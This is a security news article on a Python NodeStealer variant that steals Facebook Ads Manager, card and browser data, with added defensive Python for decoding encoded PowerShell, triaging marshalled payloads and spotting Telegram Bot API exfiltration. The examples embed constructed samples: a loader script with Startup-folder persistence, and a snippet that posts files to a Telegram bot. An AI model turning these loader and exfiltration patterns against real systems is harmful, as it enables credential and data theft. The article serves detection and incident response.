Cyber Security News

New Python NodeStealer Attacking Facebook Business To Steal Login Credentials

NodeStealer, initially a JavaScript-based malware, has evolved into a more sophisticated Python-based threat that targets Facebook Ads Manager accounts, stealing sensitive financial and business data in addition to credit card details and browser information. 

The malware is delivered through spear-phishing emails with malicious links, uses DLL sideloading and encoded PowerShell for stealthy execution, and exfiltrates data via Telegram. 

Infection chain

The attack began with a spear-phishing email disguised as a copyright infringement notice and sent from a compromised Gmail account. The message's link was dressed up as a harmless PDF document, which is what enticed recipients to click it. 

The link does not exploit a flaw in a PDF viewer; it delivers a ZIP archive, and the infection depends on the recipient running the executable inside it, which then sideloads a malicious DLL. Once running, the malware quietly exfiltrates sensitive information from the compromised system.


Email sample with the malicious embedded link

Clicking the link in the email downloads the ZIP archive “Nombor Rekod 052881.zip”. Extracting it produces several suspicious files: “GHelper.dll” and “oledlg.dll” are Dynamic Link Libraries (DLLs) used by the malware, and oledlg.dll shares its name with a legitimate Windows system library, the usual setup for DLL sideloading. 

“Nombor Rekod 052881.exe” is the main executable (a PDF reader, as the next stage shows), while “hpreaderfprefs.dat” appears to be a settings file it reads. 

The “images” folder contains a batch script (“active-license.bat”), an executable (“license-key.exe”) that may be used for further malicious actions under the guise of licensing, and another archive, “license.rar”, which is consistent with the password-protected RAR that the PowerShell stage later extracts. 

Malicious encoded PowerShell execution

Nombor Rekod 052881.exe is a legitimate PDF reader that was abused to sideload the malicious oledlg.dll placed beside it: Windows searches the application's own directory before the system directory, so the attacker's copy is loaded instead of the genuine one. The DLL then ran the batch script images\active-license.bat inside the PDF reader's process. 

That batch script, in turn, launched an encoded PowerShell command, so the next stage ran under a process tree rooted in a PDF reader rather than in an obviously malicious binary. 

The PowerShell script hides its own window, creates a working folder, and extracts a password-protected RAR archive containing a portable Python interpreter. It downloads and opens a decoy PDF, so the victim sees the document they expected, while dropping a persistence mechanism in the Startup folder.

It then downloads the final malicious payload from a remote server with Python's `requests` library and runs it in a hidden command prompt. 
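As an added example (not code from Trend Micro's report or from the malware), the following Python decodes an `-EncodedCommand` argument the way PowerShell itself does (base64 over UTF-16LE) and scores the result for the behaviours just described. The log lines and the PowerShell script they carry are constructed for the example; the patterns are heuristics, not the malware's real indicators.

```python
"""Decode PowerShell -EncodedCommand blobs from process command lines and flag the
behaviours of this loader chain (hidden window, RAR extraction, decoy download,
Startup-folder persistence, launching a bundled Python). Added example, not the
report's code."""
import base64
import binascii
import re
from typing import Optional

# -EncodedCommand and its common abbreviations take base64 over UTF-16LE text.
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# Behaviours from the chain above, as case-insensitive patterns (heuristic, not exhaustive).
INDICATORS = {
    "hidden_window": r"-w(?:indowstyle)?\s+hidden",
    "startup_persistence": r"\\Startup\\|GetFolderPath\(\s*['\"]Startup['\"]\s*\)|shell:startup",
    "archive_extraction": r"\b(?:unrar|rar|7za?)(?:\.exe)?\"?\s+[xe]\b",
    "download": r"Invoke-WebRequest|\biwr\b|DownloadFile|DownloadString|Net\.WebClient",
    "python_launch": r"\bpythonw?(?:\.exe)?\b",
}


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script if cmdline carries an -EncodedCommand blob, else None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None  # truncated by the log source, or not really base64/UTF-16LE


def analyze(cmdline: str) -> dict:
    """Score one process command line. The raw command line and the decoded script are
    scanned together because flags such as -w hidden sit outside the encoded blob."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline + "\n" + (decoded or "")
    hits = [name for name, pat in INDICATORS.items() if re.search(pat, text, re.IGNORECASE)]
    return {"decoded": decoded, "indicators": hits, "suspicious": len(hits) >= 2}


def encode_command(script: str) -> str:
    """Build an -EncodedCommand argument the way PowerShell expects it (used only to
    construct the sample below)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample (not taken from the report): a script mirroring the described steps.
# The URL is a loopback placeholder, not a real payload server.
SAMPLE_SCRIPT = r"""
$d = "$env:APPDATA\lic"; New-Item -ItemType Directory -Force -Path $d | Out-Null
& "$d\unrar.exe" x -pchangeme images\license.rar $d
Invoke-WebRequest 'http://127.0.0.1/decoy.pdf' -OutFile "$d\decoy.pdf"; Start-Process "$d\decoy.pdf"
Copy-Item "$d\run.bat" ([Environment]::GetFolderPath('Startup') + '\run.bat')
Start-Process "$d\python\python.exe" -ArgumentList "$d\stage2.py" -WindowStyle Hidden
"""

SAMPLE_LOG = [
    "powershell.exe -NoP -NonI -w hidden -enc " + encode_command(SAMPLE_SCRIPT),
    "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1",  # benign admin task
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        result = analyze(line)
        print("SUSPICIOUS" if result["suspicious"] else "ok", result["indicators"])
```

Feed it the command line from a process-creation event (Sysmon Event 1 or Windows 4688 with command-line auditing on); script-block logging (Event 4104) already records the decoded text, so for that source only the indicator scan applies.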

Python script to execute Python bytecode directly

The infostealer payload is delivered through layered obfuscation: the malware first downloads a Python script from a remote server and executes it in memory, and that script decrypts and executes a second-stage payload. The second stage does the actual theft, including credit card data and web browser credentials. 
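As an added example (not code from Trend Micro or the malware), the following Python shows what a responder does with the stage such a loader hands to `exec()`: a marshalled code object. It recovers string constants, embedded byte blobs and referenced names without executing anything. The stage-2 script it compiles is a constructed stand-in, and the token inside it is a placeholder.

```python
"""Static triage of a marshalled Python code object, the artefact an in-memory loader
passes to exec(). Nothing in the blob is run. Added example, not the report's code."""
import marshal
import types
from typing import Iterator

# Names an infostealer stage is likely to touch: a watchlist, not proof of anything.
WATCHLIST = {"requests", "marshal", "exec", "base64", "sqlite3", "win32crypt", "subprocess", "zlib"}


def iter_code_objects(code: types.CodeType) -> Iterator[types.CodeType]:
    """Yield a code object and every nested one (functions, lambdas, comprehensions)."""
    yield code
    for const in code.co_consts:
        if isinstance(const, types.CodeType):
            yield from iter_code_objects(const)


def _leaf_consts(const):
    """Descend into tuple/frozenset constants (the compiler builds these for things
    like `x in ("a", "b")`) and yield the scalar leaves."""
    if isinstance(const, (tuple, frozenset)):
        for item in const:
            yield from _leaf_consts(item)
    else:
        yield const


def triage_code_blob(blob: bytes, min_len: int = 4) -> dict:
    """Summarise a marshal.dumps() blob. The marshal format is tied to the interpreter
    version, so load it with the same Python the dropper bundled (here, the portable
    interpreter from the RAR), not an arbitrary one."""
    code = marshal.loads(blob)  # deserialises only; no bytecode executes
    strings, blobs, names = [], [], set()
    for co in iter_code_objects(code):
        names.update(co.co_names)  # imports, globals and attributes the stage refers to
        for const in co.co_consts:
            for leaf in _leaf_consts(const):
                if isinstance(leaf, str) and len(leaf) >= min_len:
                    strings.append(leaf)
                elif isinstance(leaf, bytes):
                    blobs.append(leaf)  # e.g. an encrypted next stage embedded as a literal
    return {
        "strings": strings,
        "embedded_bytes": blobs,
        "suspicious_names": sorted(names & WATCHLIST),
        "telegram_endpoints": [s for s in strings if "api.telegram.org/bot" in s],
    }


# Constructed stand-in for a second stage (not the real payload). It is compiled and
# marshalled but never executed, so the missing modules and the fake token do not matter.
SAMPLE_STAGE2 = '''
import requests, sqlite3, base64
TOKEN = "123456789:AAconstructed-placeholder-token"
STAGE3 = b"\\x00\\x11\\x22\\x33"
def exfil(path):
    url = "https://api.telegram.org/bot" + TOKEN + "/sendDocument"
    with open(path, "rb") as f:
        requests.post(url, data={"chat_id": "-100"}, files={"document": f})
'''


def build_sample_blob() -> bytes:
    """What a loader would receive over the wire: marshal.dumps(compile(...))."""
    return marshal.dumps(compile(SAMPLE_STAGE2, "<stage2>", "exec"))


if __name__ == "__main__":
    for key, value in triage_code_blob(build_sample_blob()).items():
        print(key, value)
```

Because the literal pieces survive compilation, the bot token and API path fall out as constants even though the script only assembles the full URL at run time; the same walk over `co_consts` is the first thing to try on any dumped `.pyc` or marshalled stage before reaching for a decompiler.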

The malware also targets Facebook Ads Manager accounts to extract financial and business data, and everything it collects is exfiltrated to attacker-controlled Telegram channels through the Telegram Bot API. 
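As an added example (not code from Trend Micro or the malware), the following Python scans web-proxy log lines for Telegram Bot API calls. The URL shape `https://api.telegram.org/bot<id>:<secret>/<method>` is Telegram's documented one; the log format, hosts and token are constructed for the example, and the `python-requests/` user agent is what the `requests` library sends unless the caller overrides it.

```python
"""Find Telegram Bot API exfiltration in proxy logs and pivot by bot id. The log
format and every line below are constructed for this example. Added example, not
the report's code."""
import re
from collections import defaultdict

# Constructed format: <timestamp> <src_ip> <method> <url> <status> "<user-agent>"
LOG_LINE = re.compile(
    r'^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3}) "(?P<ua>[^"]*)"$'
)
# Bot API URL shape: numeric bot id, colon, secret, then the API method.
TG_BOT = re.compile(
    r"https?://api\.telegram\.org/bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]+)/(?P<api>\w+)"
)
UPLOAD_METHODS = {"sendDocument", "sendMessage", "sendPhoto"}


def scan_proxy_log(lines):
    """Return one alert per Bot API request, with the token secret redacted so alerts
    can be shared without leaking the attacker's credential."""
    alerts = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        t = TG_BOT.search(m["url"])
        if not t:
            continue  # web.telegram.org and other traffic is not the Bot API
        ua = m["ua"]
        alerts.append({
            "src": m["src"],
            "bot_id": t["bot_id"],
            "token": f"{t['bot_id']}:{t['secret'][:4]}...",
            "api": t["api"],
            # Uploads, or a scripted client, from a workstation are the exfil pattern here.
            "severity": "high" if t["api"] in UPLOAD_METHODS or ua.startswith("python-requests/") else "medium",
        })
    return alerts


def hosts_by_bot(alerts):
    """Pivot: every source host that talked to the same bot id, to scope the incident."""
    by_bot = defaultdict(set)
    for a in alerts:
        by_bot[a["bot_id"]].add(a["src"])
    return {bot: sorted(hosts) for bot, hosts in by_bot.items()}


# Constructed sample log: two infected hosts using one bot, plus ordinary browsing.
SAMPLE_LOG = [
    '2024-11-20T09:14:02Z 10.0.4.21 POST https://api.telegram.org/bot123456789:AAconstructedSECRET/sendDocument 200 "python-requests/2.32.3"',
    '2024-11-20T09:14:05Z 10.0.4.21 POST https://api.telegram.org/bot123456789:AAconstructedSECRET/sendMessage 200 "python-requests/2.32.3"',
    '2024-11-20T09:20:11Z 10.0.4.37 GET https://web.telegram.org/a/ 200 "Mozilla/5.0"',
    '2024-11-20T09:31:40Z 10.0.6.8 POST https://api.telegram.org/bot123456789:AAconstructedSECRET/sendDocument 200 "python-requests/2.32.3"',
    '2024-11-20T09:45:00Z 10.0.4.37 GET https://example.com/ 200 "Mozilla/5.0"',
]

if __name__ == "__main__":
    found = scan_proxy_log(SAMPLE_LOG)
    for a in found:
        print(a)
    print(hosts_by_bot(found))
```

The bot id is the pivot that matters: it is stable across victims of one campaign, so once one host is confirmed, every other host that posted to the same id is in scope.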

Targeting Facebook Ads Manager accounts

According to Trend Micro, this NodeStealer variant targets Facebook Ads Manager accounts, credit card information and browser data, and combines DLL sideloading, encoded PowerShell and in-memory Python execution to evade detection. 

To counter this threat, individuals and organizations should stay alert to suspicious emails, educate users about phishing tactics, and regularly scan systems for malware. The chain also leaves concrete detection points: a PDF reader spawning cmd.exe or powershell.exe, PowerShell started with a hidden window and an encoded command, new files in a user's Startup folder, a python.exe running from a user-writable directory, and outbound connections to api.telegram.org from hosts that have no reason to use Telegram. 


Aman Mishra

Aman Mishra is a security and privacy reporter covering data breaches, cyber crime, malware and vulnerabilities.
